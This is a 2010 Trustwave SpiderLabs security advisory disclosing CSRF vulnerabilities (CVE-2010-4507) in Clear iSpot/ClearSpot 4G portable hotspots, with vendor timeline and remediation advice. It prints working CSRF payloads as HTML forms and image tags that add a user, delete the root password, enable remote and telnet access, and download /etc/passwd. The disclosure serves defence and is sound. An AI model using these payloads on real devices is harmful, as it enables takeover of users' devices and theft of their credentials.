Trustwave's SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10 Version: 1.0

Vendor: Clear (http://www.clear.com)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)
Versions affected: 
The observed behavior the result of a design choice, and may be present
on multiple versions. The specific versions used during testing are
given below.

iSpot version:      	 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] 
Clearspot versions:		 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
                    	 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version :  	 1.9.9.4
Hardware Version :  	 R051.2 
Device Name :            IMW-C615W
Device Manufacturer :    INFOMARK (http://infomark.co.kr)

Product Description:
iSpot and ClearSpot 4G are portable 4G devices, that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time, on the same 4G connection.

Credit: Matthew Jakubowski of Trustwave's SpiderLabs

CVE: CVE-2010-4507

Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker that is able to coerce a ClearSpot / iSpot user into
following a link can arbitrarily execute system commands on the device.

The following examples will allow an attacker to enable remote access to the
iSpot and ClearSpot 4G, and add their own account to the device. This level
of access also provides a device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.

Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku'>

Remove root password:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root'>

Enable remote administration access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80'>

Enable telnet if not already enabled:

<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES'>

Allow remote telnet access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>

Once compromised, it is possible to download any file from the devices using
the following method.

Download /etc/passwd file:
<form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi <http://192.168.1.1/cgi-bin/upgrademain.cgi> ">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd'>

Vendor Response:
No official response is available at the time of release.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized 
personnel through the use of Access Control Lists and proper
network segmentation.

Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.

Revision History: 
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management solutions
to businesses and government entities throughout the world. For organizations
faced with today's challenging data security and compliance environment,
Trustwave provides a unique approach with comprehensive solutions that include
its flagship TrustKeeper compliance management software and other proprietary
security solutions. Trustwave has helped thousands of organizations--ranging
from Fortune 500 businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their network
infrastructure, data communications and critical information assets. Trustwave
is headquartered in Chicago with offices throughout North America, South
America, Europe, Africa, China and Australia. For more information, visit
https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for incident
response and forensics, ethical hacking and application security tests for
Trustwave's clients. SpiderLabs has responded to hundreds of security incidents,
performed thousands of ethical hacking exercises and tested the security of
hundreds of business applications for Fortune 500 organizations.  For more
information visit https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty
of any kind. Trustwave disclaims all warranties, either express or implied,
including the warranties of merchantability and fitness for a particular
purpose. In no event shall Trustwave or its suppliers be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of
business profits or special damages, even if Trustwave or its suppliers have
been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation may not apply.